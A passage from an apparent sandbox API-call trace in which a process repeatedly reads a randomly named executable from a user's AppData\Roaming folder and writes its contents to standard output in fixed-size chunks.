(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cde8c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0134.532] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0134.532] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.532] GetFileType (hFile=0x58) returned 0x1 [0134.532] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.533] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x1cdee4 | out: lpFileSizeHigh=0x1cdee4*=0x0) returned 0x7d600 [0134.533] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.533] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.533] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.533] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.534] GetFileType (hFile=0x50) returned 0x1 [0134.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.534] GetFileType (hFile=0x50) returned 0x1 [0134.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.534] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] GetFileType (hFile=0x50) returned 0x1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] GetFileType (hFile=0x50) returned 0x1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] GetFileType (hFile=0x50) returned 0x1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] GetFileType (hFile=0x50) returned 0x1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] GetFileType (hFile=0x50) returned 0x1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] GetFileType (hFile=0x50) returned 0x1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.535] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.536] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.537] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.537] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.538] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.538] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.539] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.539] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.540] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.540] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.541] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.541] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.542] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.542] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, 